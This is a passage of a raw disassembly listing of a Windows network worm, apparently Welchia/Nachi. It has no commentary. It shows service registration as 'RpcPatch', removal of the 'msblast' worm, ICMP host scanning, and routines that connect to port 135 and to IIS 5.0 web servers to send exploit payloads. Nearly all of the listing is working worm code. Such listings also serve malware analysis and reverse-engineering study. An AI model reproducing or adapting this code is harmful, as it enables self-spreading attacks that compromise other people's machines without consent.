		add	esp, 1Ch
		retn
; ---------------------------------------------------------------------------


loc_402777:				; CODE XREF: sub_402730+3Aj
		lea	eax, [esp+24h+var_1C]
		push	eax
		push	esi
		call	dword_40401C	; QueryServiceStatus
		test	eax, eax
		push	esi
		mov	esi, dword_404034
		jnz	short loc_40279E
		call	esi ; dword_404034
		push	edi
		call	esi ; dword_404034
		pop	edi
		mov	eax, 33333333h
		pop	esi
		add	esp, 1Ch
		retn
; ---------------------------------------------------------------------------


loc_40279E:				; CODE XREF: sub_402730+5Cj
		call	esi ; dword_404034
		push	edi
		call	esi ; dword_404034
		mov	eax, [esp+24h+var_18]
		pop	edi
		pop	esi
		add	esp, 1Ch
		retn
sub_402730	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4027B0	proc near		; CODE XREF: sub_4011C0+6p
		push	offset aRpcpatch_mutex ; "RpcPatch_Mutex"
		push	0
		push	0
		call	dword_404084	; CreateMutexA
		test	eax, eax
		jz	short loc_4027D3
		call	dword_404060	; RtlGetLastWin32Error
		cmp	eax, 0B7h
		jz	short loc_4027D3
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------


loc_4027D3:				; CODE XREF: sub_4027B0+11j
					; sub_4027B0+1Ej
		mov	eax, 1
		retn
sub_4027B0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4027E0	proc near		; CODE XREF: sub_4011C0:loc_4011FCj

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		sub	esp, 10h
		xor	eax, eax
		mov	[esp+10h+var_10], offset aRpcpatch ; "RpcPatch"
		mov	[esp+10h+var_8], eax
		mov	[esp+10h+var_4], eax
		lea	eax, [esp+10h+var_10]
		mov	[esp+10h+var_C], offset	loc_402920
		push	eax
		call	dword_404018	; StartServiceCtrlDispatcherA
		neg	eax
		sbb	eax, eax
		neg	eax
		dec	eax
		add	esp, 10h
		retn
sub_4027E0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402820	proc near		; CODE XREF: sub_402880+1Ap
					; sub_402880+33p ...

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		sub	esp, 1Ch
		mov	eax, [esp+1Ch+arg_0]
		mov	ecx, [esp+1Ch+arg_8]
		mov	dword_405BA0, eax
		mov	[esp+1Ch+var_18], eax
		mov	eax, [esp+1Ch+arg_4]
		lea	edx, [esp+1Ch+var_1C]
		mov	[esp+1Ch+var_10], eax
		mov	eax, ds:dword_4076A8
		push	edx
		push	eax
		mov	[esp+24h+var_1C], 10h
		mov	[esp+24h+var_14], 5
		mov	[esp+24h+var_C], 0
		mov	[esp+24h+var_8], ecx
		mov	[esp+24h+var_4], 0BB8h
		call	dword_404014	; SetServiceStatus
		add	esp, 1Ch
		retn
sub_402820	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402880	proc near		; DATA XREF: seg000:loc_402920o

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		dec	eax
		cmp	eax, 3		; switch 4 cases
		ja	short locret_402909 ; default
		jmp	off_40290C[eax*4] ; switch jump


loc_402891:				; DATA XREF: seg000:off_40290Co
		push	1388h		; jumptable 0040288A case 0
		push	0
		push	3
		call	sub_402820
		add	esp, 0Ch
		push	3E8h
		call	dword_4040C8	; Sleep
		push	0
		push	0
		push	1
		call	sub_402820
		add	esp, 0Ch
		retn	4
; ---------------------------------------------------------------------------


loc_4028BE:				; CODE XREF: sub_402880+Aj
					; DATA XREF: seg000:off_40290Co
		push	1		; jumptable 0040288A case 1
		push	0
		push	6
		call	sub_402820
		push	0
		push	0
		push	7
		call	sub_402820
		add	esp, 18h
		retn	4
; ---------------------------------------------------------------------------


loc_4028DA:				; CODE XREF: sub_402880+Aj
					; DATA XREF: seg000:off_40290Co
		push	1		; jumptable 0040288A case 2
		push	0
		push	5
		call	sub_402820
		push	0
		push	0
		push	4
		call	sub_402820
		add	esp, 18h
		retn	4
; ---------------------------------------------------------------------------


loc_4028F6:				; CODE XREF: sub_402880+Aj
					; DATA XREF: seg000:off_40290Co
		mov	ecx, dword_405BA0 ; jumptable 0040288A case 3
		push	0
		push	0
		push	ecx
		call	sub_402820
		add	esp, 0Ch

locret_402909:				; CODE XREF: sub_402880+8j
		retn	4		; default
sub_402880	endp

; ---------------------------------------------------------------------------
off_40290C	dd offset loc_402891	; DATA XREF: sub_402880+Ar
		dd offset loc_4028BE	; jump table for switch	statement
		dd offset loc_4028DA
		dd offset loc_4028F6
		align 10h


loc_402920:				; DATA XREF: sub_4027E0+19o
		push	offset sub_402880
		push	offset aRpcpatch ; "RpcPatch"
		call	dword_404010	; RegisterServiceCtrlHandlerA
		test	eax, eax
		mov	ds:dword_4076A8, eax
		jz	short locret_40296D
		push	1
		push	0
		push	2
		call	sub_402820
		push	0
		push	0
		push	4
		call	sub_402820
		call	sub_401280
		push	0
		push	0
		push	3
		call	sub_402820
		push	0
		push	0
		push	1
		call	sub_402820
		add	esp, 30h

locret_40296D:				; CODE XREF: seg000:00402937j
		retn	8

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402970	proc near		; CODE XREF: sub_401280+4Ep

var_210		= byte ptr -210h
var_10C		= byte ptr -10Ch
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 210h
		push	esi
		mov	esi, dword_4040A8
		lea	eax, [ebp+var_10C]
		push	104h
		push	eax
		push	0
		call	esi ; dword_4040A8
		lea	ecx, [ebp+var_10C]
		push	ecx
		call	dword_404074	; GetFileAttributesA
		test	al, 1
		jz	short loc_4029B1
		and	al, 0FEh
		lea	edx, [ebp+var_10C]
		push	eax
		push	edx
		call	dword_404078	; SetFileAttributesA


loc_4029B1:				; CODE XREF: sub_402970+2Fj
		push	0
		call	dword_40407C	; GetModuleHandleA
		lea	ecx, [ebp+var_210]
		push	104h
		push	ecx
		push	eax
		mov	[ebp+var_4], eax
		call	esi ; dword_4040A8
		push	4
		call	dword_4040E0	; CloseHandle
		lea	eax, [ebp+var_210]
		push	0
		push	0
		push	eax
		push	dword_4040BC
		push	[ebp+var_4]
		push	dword_4040E8
		push	dword_404080
		retn
sub_402970	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	esi
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402A00	proc near		; CODE XREF: sub_401280+1Ep
					; sub_401280+1D9p

var_108		= byte ptr -108h
var_107		= byte ptr -107h

		sub	esp, 108h
		push	esi
		push	edi
		push	offset aMsblast	; "msblast"
		call	sub_401000
		add	esp, 4
		test	eax, eax
		jz	short loc_402A48
		push	eax
		push	0
		push	1F0FFFh
		call	dword_404070	; OpenProcess
		mov	esi, eax
		test	esi, esi
		jz	short loc_402A48
		push	1
		push	esi
		call	dword_4040AC	; TerminateProcess
		push	1388h
		call	dword_4040C8	; Sleep
		push	esi
		call	dword_4040E0	; CloseHandle


loc_402A48:				; CODE XREF: sub_402A00+17j
					; sub_402A00+2Bj
		mov	ecx, 41h
		xor	eax, eax
		lea	edi, [esp+110h+var_107]
		mov	[esp+110h+var_108], 0
		rep stosd
		push	offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
		lea	eax, [esp+114h+var_108]
		push	offset aSMsblast_exe ; "%s\\msblast.exe"
		push	eax
		call	dword_40411C	; sprintf
		add	esp, 0Ch
		lea	ecx, [esp+110h+var_108]
		push	ecx
		call	dword_404074	; GetFileAttributesA
		pop	edi
		pop	esi
		test	al, 1
		jz	short loc_402A91
		and	al, 0FEh
		lea	edx, [esp+108h+var_108]
		push	eax
		push	edx
		call	dword_404078	; SetFileAttributesA


loc_402A91:				; CODE XREF: sub_402A00+81j
		lea	eax, [esp+108h+var_108]
		push	eax
		call	dword_4040E8	; DeleteFileA
		add	esp, 108h
		retn
sub_402A00	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402AB0	proc near		; CODE XREF: sub_402B20+26p
					; sub_402C40+27p

arg_0		= dword	ptr  4

		push	esi
		push	edi
		call	sub_403122	; IcmpCreateFile
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_402AC3
		pop	edi
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------


loc_402AC3:				; CODE XREF: sub_402AB0+Cj
		push	5Ch
		push	40h
		call	dword_404068	; GlobalAlloc
		mov	esi, eax
		test	esi, esi
		jnz	short loc_402ADE
		push	edi
		call	sub_40311C	; IcmpCloseHandle
		pop	edi
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------


loc_402ADE:				; CODE XREF: sub_402AB0+21j
		mov	eax, [esp+8+arg_0]
		push	ebx
		push	7D0h
		push	5Ch
		push	esi
		push	0
		push	40h
		push	offset dword_406430
		push	eax
		push	edi
		mov	dword ptr [esi+10h], offset dword_406430
		mov	word ptr [esi+0Ch], 40h
		call	sub_403116	; IcmpSendEcho
		push	esi
		mov	ebx, eax
		call	dword_40406C	; GlobalFree
		push	edi
		call	sub_40311C	; IcmpCloseHandle
		mov	eax, ebx
		pop	ebx
		pop	edi
		pop	esi
		retn
sub_402AB0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402B20	proc near		; DATA XREF: sub_401470+F0o

var_414		= word ptr -414h
var_410		= dword	ptr -410h
var_40C		= dword	ptr -40Ch
var_3FC		= byte ptr -3FCh
arg_0		= dword	ptr  4

		sub	esp, 414h
		push	ebp
		push	esi
		push	offset dword_4075A4
		call	dword_404088	; InterlockedIncrement
		mov	dword ptr [esp+41Ch+var_414], 0BB8h
		mov	ebp, [esp+41Ch+arg_0]
		mov	esi, [ebp+0]
		push	esi
		call	sub_402AB0
		add	esp, 4
		test	eax, eax
		jz	loc_402C17
		push	87h
		mov	word ptr [esp+420h+var_410], 2
		mov	[esp+420h+var_40C], esi
		call	dword_404174	; ntohs
		push	0
		push	1
		push	2
		mov	word ptr [esp+428h+var_410+2], ax
		call	dword_404150	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jz	loc_402C17
		push	ebx
		push	edi
		lea	eax, [esp+424h+var_410]
		push	10h
		push	eax
		push	esi
		call	dword_404154	; connect
		cmp	eax, 0FFFFFFFFh
		jz	short loc_402C0E
		mov	ebx, dword_404168
		push	0
		push	48h
		push	offset dword_405434
		push	esi
		call	ebx ; dword_404168
		cmp	eax, 0FFFFFFFFh
		jz	short loc_402C0E
		lea	ecx, [esp+420h+var_410]
		push	4
		push	ecx
		push	1006h
		push	0FFFFh
		push	esi
		call	dword_404164	; setsockopt
		mov	edi, dword_40416C
		push	0
		lea	edx, [esp+424h+var_3FC]
		push	3E8h
		push	edx
		push	esi
		call	edi ; dword_40416C
		cmp	eax, 0FFFFFFFFh
		jz	short loc_402C0E
		test	eax, eax
		jz	short loc_402C0E
		mov	eax, dword_406420
		push	0
		push	eax
		push	offset dword_406470
		push	esi
		call	ebx ; dword_404168
		cmp	eax, 0FFFFFFFFh
		jz	short loc_402C0E
		push	0
		lea	ecx, [esp+424h+var_3FC]
		push	400h
		push	ecx
		push	esi
		call	edi ; dword_40416C


loc_402C0E:				; CODE XREF: sub_402B20+7Bj
					; sub_402B20+92j ...
		push	esi
		call	dword_404170	; closesocket
		pop	edi
		pop	ebx


loc_402C17:				; CODE XREF: sub_402B20+30j
					; sub_402B20+62j
		test	ebp, ebp
		jz	short loc_402C24
		push	ebp
		call	sub_402FC6
		add	esp, 4


loc_402C24:				; CODE XREF: sub_402B20+F9j
		push	offset dword_4075A4
		call	dword_404064	; InterlockedDecrement
		pop	esi
		xor	eax, eax
		pop	ebp
		add	esp, 414h
		retn	4
sub_402B20	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402C40	proc near		; DATA XREF: sub_401470+E1o

var_5AC		= word ptr -5ACh
var_5A8		= dword	ptr -5A8h
var_5A4		= dword	ptr -5A4h
var_594		= byte ptr -594h
var_574		= byte ptr -574h
var_2B8		= byte ptr -2B8h
arg_0		= dword	ptr  4

		sub	esp, 5ACh
		push	ebx
		push	ebp
		push	esi
		push	edi
		push	offset dword_4075A4
		call	dword_404088	; InterlockedIncrement
		mov	dword ptr [esp+5BCh+var_5AC], 0BB8h
		mov	eax, [esp+5BCh+arg_0]
		mov	esi, [eax]
		push	esi
		call	sub_402AB0
		add	esp, 4
		test	eax, eax
		jz	loc_402EC5
		push	50h
		mov	word ptr [esp+5C0h+var_5A8], 2
		mov	[esp+5C0h+var_5A4], esi
		call	dword_404174	; ntohs
		push	0
		push	1
		push	2
		mov	word ptr [esp+5C8h+var_5A8+2], ax
		call	dword_404150	; socket
		mov	ebp, eax
		cmp	ebp, 0FFFFFFFFh
		jz	loc_402EC5
		lea	ecx, [esp+5BCh+var_5A8]
		push	10h
		push	ecx
		push	ebp
		call	dword_404154	; connect
		cmp	eax, 0FFFFFFFFh
		jz	loc_402EBE
		push	esi
		call	dword_40415C	; inet_ntoa
		mov	edi, eax
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		lea	edx, [esp+5B8h+var_594]
		repne scasb
		not	ecx
		sub	edi, ecx
		push	offset aConnectionKeep ; "\r\nConnection: Keep-Alive\r\n\r\n"
		mov	eax, ecx
		mov	esi, edi
		mov	edi, edx
		lea	edx, [esp+5BCh+var_574]
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		lea	ecx, [esp+5BCh+var_594]
		push	ecx
		push	offset aGetHttp1_1Acce ; "GET /	HTTP/1.1\r\nAccept: image/gif, imag"...
		push	offset aSSS	; "%s%s%s"
		push	edx
		call	dword_40411C	; sprintf
		lea	edi, [esp+5CCh+var_574]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		add	esp, 14h
		repne scasb
		not	ecx
		dec	ecx
		push	0
		lea	eax, [esp+5BCh+var_574]
		push	ecx
		push	eax
		push	ebp
		call	dword_404168	; send
		cmp	eax, 0FFFFFFFFh
		jz	loc_402EBE
		mov	ebx, dword_404164
		lea	ecx, [esp+5B8h+var_5A8]
		push	4
		push	ecx
		push	1006h
		push	0FFFFh
		push	ebp
		call	ebx ; dword_404164
		push	0
		lea	edx, [esp+5BCh+var_2B8]
		push	2BBh
		push	edx
		push	ebp
		call	dword_40416C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	loc_402EBE
		test	eax, eax
		jz	loc_402EBE
		mov	[esp+eax+5B8h+var_2B8],	0
		lea	eax, [esp+5B8h+var_2B8]
		push	offset aServerMicrosof ; "Server: Microsoft-IIS/5.0"
		push	eax
		call	dword_404100	; strstr
		add	esp, 8
		test	eax, eax
		jz	loc_402EBE
		push	ebp
		call	dword_404170	; closesocket
		mov	esi, dword_4040C8
		push	64h
		call	esi ; dword_4040C8
		push	0
		push	1
		push	2
		call	dword_404150	; socket
		mov	ebp, eax
		cmp	ebp, 0FFFFFFFFh
		jz	loc_402EC5
		lea	ecx, [esp+5BCh+var_5A8]
		push	10h
		push	ecx
		push	ebp
		call	dword_404154	; connect
		cmp	eax, 0FFFFFFFFh
		jz	loc_402EBE
		lea	edx, [esp+5B8h+var_594]
		lea	eax, [esp+5B8h+var_574]
		push	edx
		push	offset aSearchHttp1_1H ; "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n"
		push	eax
		call	dword_40411C	; sprintf
		lea	edi, [esp+5C4h+var_574]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		add	esp, 0Ch
		repne scasb
		not	ecx
		dec	ecx
		push	0
		push	ecx
		lea	ecx, [esp+5C0h+var_574]
		push	ecx
		push	ebp
		call	dword_404168	; send
		cmp	eax, 0FFFFFFFFh
		jz	loc_402EBE
		lea	edx, [esp+5B8h+var_5A8]
		push	4
		push	edx
		push	1006h
		push	0FFFFh
		push	ebp
		call	ebx ; dword_404164
		push	0
		lea	eax, [esp+5BCh+var_2B8]
		push	63h
		push	eax
		push	ebp
		call	dword_40416C	; recv
		cmp	eax, 0FFFFFFFFh
		jz	short loc_402EBE
		test	eax, eax
		jz	short loc_402EBE
		lea	ecx, [esp+5B8h+var_2B8]
		push	offset a411	; "411"
		push	ecx
		mov	[esp+eax+5C0h+var_2B8],	0
		call	dword_404100	; strstr
		add	esp, 8
		test	eax, eax
		jz	short loc_402EBE
		push	ebp
		call	dword_404170	; closesocket
		push	64h
		call	esi ; dword_4040C8
		push	0
		push	1
		push	2
		call	dword_404150	; socket
		mov	ebp, eax
		cmp	ebp, 0FFFFFFFFh
		jz	short loc_402EC5
		lea	edx, [esp+5BCh+var_5A8]
		push	10h
		push	edx
		push	ebp
		call	dword_404154	; connect
		cmp	eax, 0FFFFFFFFh
		jz	short loc_402EBE
		push	64h
		call	esi ; dword_4040C8
		mov	edx, ds:dword_4075A0
		or	ecx, 0FFFFFFFFh
		mov	edi, edx
		xor	eax, eax
		repne scasb
		not	ecx
		dec	ecx
		push	ecx
		push	edx
		push	ebp
		call	sub_402F50
		add	esp, 0Ch
		push	0BB8h
		call	esi ; dword_4040C8


loc_402EBE:				; CODE XREF: sub_402C40+77j
					; sub_402C40+E9j ...
		push	ebp
		call	dword_404170	; closesocket


loc_402EC5:				; CODE XREF: sub_402C40+31j
					; sub_402C40+60j ...
		mov	eax, [esp+5BCh+arg_0]
		pop	edi
		pop	esi
		pop	ebp
		test	eax, eax
		pop	ebx
		jz	short loc_402EDD
		push	eax
		call	sub_402FC6
		add	esp, 4


loc_402EDD:				; CODE XREF: sub_402C40+292j
		push	offset dword_4075A4
		call	dword_404064	; InterlockedDecrement
		xor	eax, eax
		add	esp, 5ACh
		retn	4
sub_402C40	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402F00	proc near		; CODE XREF: sub_401280+3Cp
					; sub_401280+46p

arg_0		= dword	ptr  4

		push	esi
		push	edi
		push	0F003Fh
		push	0
		push	0
		call	dword_40402C	; OpenSCManagerA
		mov	edi, eax
		test	edi, edi
		jz	short loc_402F4B
		mov	eax, [esp+8+arg_0]
		push	0F01FFh
		push	eax
		push	edi
		call	dword_404038	; OpenServiceA
		mov	esi, eax
		test	esi, esi
		jnz	short loc_402F38
		push	edi
		call	dword_404034	; CloseServiceHandle
		pop	edi
		pop	esi
		retn
; ---------------------------------------------------------------------------


loc_402F38:				; CODE XREF: sub_402F00+2Cj
		push	esi
		call	dword_40400C	; DeleteService
		push	esi
		mov	esi, dword_404034
		call	esi ; dword_404034
		push	edi
		call	esi ; dword_404034


loc_402F4B:				; CODE XREF: sub_402F00+15j
		pop	edi
		pop	esi
		retn
sub_402F00	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_402F50	proc near		; CODE XREF: sub_402C40+26Fp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	ecx
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, [esp+14h+arg_8]
		xor	ebx, ebx
		cmp	edi, ebx
		mov	[esp+14h+var_4], edi
		mov	[esp+14h+arg_8], ebx
		jle	short loc_402FA3
		mov	ebp, [esp+14h+arg_4]


loc_402F6B:				; CODE XREF: sub_402F50+51j
		mov	ecx, [esp+14h+arg_0]
		push	0
		lea	eax, [ebx+ebp]
		push	edi
		push	eax
		push	ecx
		call	dword_404168	; send
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jz	short loc_402FAD
		test	esi, esi
		jnz	short loc_402F9B
		cmp	[esp+14h+arg_8], 64h
		jge	short loc_402FAD
		push	5
		call	dword_4040C8	; Sleep
		inc	[esp+14h+arg_8]


loc_402F9B:				; CODE XREF: sub_402F50+36j
		sub	edi, esi
		add	ebx, esi
		test	edi, edi
		jg	short loc_402F6B


loc_402FA3:				; CODE XREF: sub_402F50+15j
		mov	eax, [esp+14h+var_4]
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		retn
; ---------------------------------------------------------------------------


loc_402FAD:				; CODE XREF: sub_402F50+32j
					; sub_402F50+3Dj
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		pop	ecx
		retn
sub_402F50	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402FC0	proc near		; CODE XREF: sub_401280+8Bp
					; sub_401470+9Bp ...
		jmp	dword_404108
sub_402FC0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402FC6	proc near		; CODE XREF: sub_401C80+1EAp
					; sub_402B20+FCp ...
		jmp	dword_404138
sub_402FC6	endp

; ---------------------------------------------------------------------------


loc_402FCC:				; CODE XREF: seg001:004091B8j
		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	offset dword_4041A8
		push	offset loc_403100
		mov	eax, large fs:0
		push	eax
		mov	large fs:0, esp
		sub	esp, 20h
		push	ebx
		push	esi
		push	edi
		mov	[ebp-18h], esp
		and	dword ptr [ebp-4], 0
		push	1
		call	dword_404128	; __set_app_type
		pop	ecx
		or	ds:dword_4076BC, 0FFFFFFFFh
		or	ds:dword_4076C0, 0FFFFFFFFh
		call	dword_404124	; __p__fmode
		mov	ecx, ds:dword_4076B8
		mov	[eax], ecx
		call	dword_404118	; __p__commode
		mov	ecx, ds:dword_4076B4
		mov	[eax], ecx
		mov	eax, dword_404114
		mov	eax, [eax]
		mov	ds:dword_4076C4, eax
		call	nullsub_1
		cmp	dword_406414, 0
		jnz	short loc_40304F
		push	offset sub_4030FA
		call	dword_404110	; __setusermatherr
		pop	ecx


loc_40304F:				; CODE XREF: seg000:00403041j
		call	sub_4030E8
		push	offset dword_40500C
		push	offset dword_405008
		call	sub_4030E2	; _initterm
		mov	eax, ds:dword_4076B0
		mov	[ebp-28h], eax
		lea	eax, [ebp-28h]
		push	eax
		push	ds:dword_4076AC
		lea	eax, [ebp-20h]
		push	eax
		lea	eax, [ebp-2Ch]
		push	eax
		lea	eax, [ebp-1Ch]
		push	eax
		call	dword_4040F8	; __getmainargs
		push	offset dword_405004
		push	offset dword_405000
		call	sub_4030E2	; _initterm
		call	dword_40410C	; __p___initenv
		mov	ecx, [ebp-20h]
		mov	[eax], ecx
		push	dword ptr [ebp-20h]
		push	dword ptr [ebp-2Ch]
		push	dword ptr [ebp-1Ch]
		call	sub_4011C0
		add	esp, 30h
		mov	[ebp-24h], eax
		push	eax
		call	dword_4040F0	; exit
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-30h], ecx
		push	eax
		push	ecx
		call	sub_4030DC	; _XcptFilter
		pop	ecx
		pop	ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		push	dword ptr [ebp-30h]
		call	dword_404134	; _exit

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4030DC	proc near		; CODE XREF: seg000:004030C8p
		jmp	dword_4040F4
sub_4030DC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4030E2	proc near		; CODE XREF: seg000:0040305Ep
					; seg000:00403091p
		jmp	dword_4040FC
sub_4030E2	endp


; =============== S U B	R O U T	I N E =======================================



sub_4030E8	proc near		; CODE XREF: seg000:loc_40304Fp
		push	30000h
		push	10000h
		call	sub_403106	; _controlfp
		pop	ecx
		pop	ecx
		retn
sub_4030E8	endp


; =============== S U B	R O U T	I N E =======================================



sub_4030FA	proc near		; DATA XREF: seg000:00403043o
		xor	eax, eax
		retn
sub_4030FA	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
		align 10h


loc_403100:				; DATA XREF: seg000:00402FD6o
		jmp	dword_40412C

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403106	proc near		; CODE XREF: sub_4030E8+Ap
		jmp	dword_404130
sub_403106	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403110	proc near		; CODE XREF: sub_4016E0+10p
		jmp	dword_40419C
sub_403110	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403116	proc near		; CODE XREF: sub_402AB0+53p
		jmp	dword_404058
sub_403116	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_40311C	proc near		; CODE XREF: sub_402AB0+24p
					; sub_402AB0+62p
		jmp	dword_404050
sub_40311C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403122	proc near		; CODE XREF: sub_402AB0+2p
		jmp	dword_404054
sub_403122	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403128	proc near		; CODE XREF: sub_401000+C0p
		jmp	dword_4040DC
sub_403128	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_40312E	proc near		; CODE XREF: sub_401000+7Cp
		jmp	dword_4040D8
sub_40312E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403134	proc near		; CODE XREF: sub_401000+62p
		jmp	dword_4040D4
sub_403134	endp

; ---------------------------------------------------------------------------
		align 4
		dd 3B1h	dup(0)
dword_404000	dd 77E36F61h	; resolved to->ADVAPI32.ChangeServiceConfig2Adword_404004	dd 77E377F9h	; resolved to->ADVAPI32.QueryServiceConfig2Adword_404008	dd 77DF3238h	; resolved to->ADVAPI32.StartServiceAdword_40400C	dd 77E37311h	; resolved to->ADVAPI32.DeleteServicedword_404010	dd 77DF0953h	; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_404014	dd 77DEB193h	; resolved to->ADVAPI32.SetServiceStatusdword_404018	dd 77E37D39h	; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_40401C	dd 77DE5EB8h	; resolved to->ADVAPI32.QueryServiceStatus					; sub_402540+17Ar ...
dword_404020	dd 77DF5462h	; resolved to->ADVAPI32.QueryServiceConfigAdword_404024	dd 77E36CC9h	; resolved to->ADVAPI32.ChangeServiceConfigAdword_404028	dd 77DFC534h	; resolved to->ADVAPI32.AdjustTokenPrivilegesdword_40402C	dd 77DEADA7h	; resolved to->ADVAPI32.OpenSCManagerA					; sub_402540+11r ...
dword_404030	dd 77E37071h	; resolved to->ADVAPI32.CreateServiceAdword_404034	dd 77DE5E4Dh	; resolved to->ADVAPI32.CloseServiceHandle					; sub_4023E0+11Dr ...
dword_404038	dd 77DEB88Ch	; resolved to->ADVAPI32.OpenServiceA					; sub_402540+60r ...
dword_40403C	dd 77DD761Bh	; resolved to->ADVAPI32.RegOpenKeyExAdword_404040	dd 77DD6BF0h	; resolved to->ADVAPI32.RegCloseKeydword_404044	dd 77DD7753h	; resolved to->ADVAPI32.OpenProcessTokendword_404048	dd 77DFD11Bh	; resolved to->ADVAPI32.LookupPrivilegeValueA		align 10h
dword_404050	dd 76D64D33h	; resolved to->IPHLPAPI.IcmpCloseHandledword_404054	dd 76D64D5Eh	; resolved to->IPHLPAPI.IcmpCreateFiledword_404058	dd 76D64B79h	; resolved to->IPHLPAPI.IcmpSendEcho		align 10h
dword_404060	dd 7C910331h	; resolved to->NTDLL.RtlGetLastWin32Errordword_404064	dd 7C80977Ah	; resolved to->KERNEL32.InterlockedDecrement					; sub_402C40+2A2r
dword_404068	dd 7C80FD2Dh	; resolved to->KERNEL32.GlobalAllocdword_40406C	dd 7C80FC2Fh	; resolved to->KERNEL32.GlobalFreedword_404070	dd 7C8309E1h	; resolved to->KERNEL32.OpenProcessdword_404074	dd 7C81153Ch	; resolved to->KERNEL32.GetFileAttributesA					; sub_402A00+77r
dword_404078	dd 7C812782h	; resolved to->KERNEL32.SetFileAttributesA					; sub_402A00+8Br
dword_40407C	dd 7C80B6A1h	; resolved to->KERNEL32.GetModuleHandleAdword_404080	dd 7C80B974h	; resolved to->KERNEL32.UnmapViewOfFiledword_404084	dd 7C80E93Fh	; resolved to->KERNEL32.CreateMutexAdword_404088	dd 7C809766h	; resolved to->KERNEL32.InterlockedIncrement					; sub_402C40+Fr
dword_40408C	dd 7C80998Dh	; resolved to->KERNEL32.LocalAlloc					; sub_402540+7Er
dword_404090	dd 7C80992Fh	; resolved to->KERNEL32.LocalFree					; sub_402540+1CFr
dword_404094	dd 7C8111DAh	; resolved to->KERNEL32.GetVersiondword_404098	dd 7C812ADEh	; resolved to->KERNEL32.GetVersionExAdword_40409C	dd 7C80DDF5h	; resolved to->KERNEL32.GetCurrentProcessdword_4040A0	dd 7C8127A7h	; resolved to->KERNEL32.GetOEMCPdword_4040A4	dd 7C80BF3Dh	; resolved to->KERNEL32.GetSystemDefaultLCIDdword_4040A8	dd 7C80B4CFh	; resolved to->KERNEL32.GetModuleFileNameA					; sub_402970+Ar
dword_4040AC	dd 7C801E16h	; resolved to->KERNEL32.TerminateProcess					; sub_402A00+30r
dword_4040B0	dd 7C802520h	; resolved to->KERNEL32.WaitForSingleObjectdword_4040B4	dd 7C8286EEh	; resolved to->KERNEL32.CopyFileA					; sub_401660+42r
dword_4040B8	dd 7C80A7D4h	; resolved to->KERNEL32.GetLocalTimedword_4040BC	dd 7C81CDDAh	; resolved to->KERNEL32.ExitProcess					; sub_401990+A1r ...
